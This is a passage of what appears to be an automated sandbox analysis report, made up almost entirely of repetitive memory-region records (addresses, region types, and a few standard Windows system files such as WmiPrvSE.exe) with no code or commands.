monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1114 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1115 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1116 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1117 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1118 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1119 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1120 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1121 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1122 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1123 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1124 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1125 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1126 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1127 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1128 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1129 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1130 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1131 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1132 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1133 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1134 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1135 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1136 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1137 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1138 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1139 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1140 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1141 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1142 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1143 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1144 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1145 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1146 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1147 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1148 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1149 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1150 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1151 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1152 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1153 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1154 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1155 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1156 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1157 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1158 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1159 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1160 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1161 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1162 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1163 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1164 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1165 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1166 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1167 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1168 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1169 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1170 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1171 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1172 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1173 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1174 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1175 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1176 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1177 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1178 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1179 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1180 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1181 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1182 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1183 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1184 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1185 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1186 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1187 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1188 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1189 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1190 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1191 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1192 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1193 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1194 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1195 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1196 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1197 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1198 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1199 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1200 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1201 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1202 start_va = 0x7ff83c4c0000 end_va = 0x7ff83c4cefff monitored = 0 entry_point = 0x7ff83c4c59a0 region_type = mapped_file name = "perfproc.dll" filename = "\\Windows\\System32\\perfproc.dll" (normalized: "c:\\windows\\system32\\perfproc.dll") Region: id = 1267 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1383 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1542 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1610 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1772 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1942 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1944 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1946 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2024 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2151 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2296 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2518 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2647 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2829 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3052 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3158 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3423 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3868 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4034 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4220 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4556 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4745 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4797 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4798 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4799 start_va = 0x410000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4800 start_va = 0x29f0000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 4801 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5103 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5155 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5159 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5160 start_va = 0x7ff83c4b0000 end_va = 0x7ff83c4befff monitored = 0 entry_point = 0x7ff83c4b1420 region_type = mapped_file name = "netfxperf.dll" filename = "\\Windows\\System32\\netfxperf.dll" (normalized: "c:\\windows\\system32\\netfxperf.dll") Region: id = 5161 start_va = 0x1610000 end_va = 0x16cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 5162 start_va = 0x400000 end_va = 0x47bfff monitored = 0 entry_point = 0x415f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 5163 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5164 start_va = 0x400000 end_va = 0x41bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5165 start_va = 0x29f0000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029f0000" filename = "" Region: id = 5166 start_va = 0x420000 end_va = 0x438fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5167 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5168 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5169 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5170 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5171 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5172 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5173 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5174 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5175 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5176 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5177 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5178 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5179 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5180 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5181 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5182 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5183 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5184 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5185 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5186 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5187 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5188 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5189 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5190 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5191 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5192 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5193 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5194 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5195 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5196 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5197 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5198 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5199 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5200 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5201 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5202 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5203 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5204 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5205 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5206 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5207 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5208 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5209 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5210 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5211 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5212 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5213 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5214 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5215 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5216 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5217 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5218 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5219 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5220 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5221 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5222 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5223 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5224 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5225 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5226 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5227 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 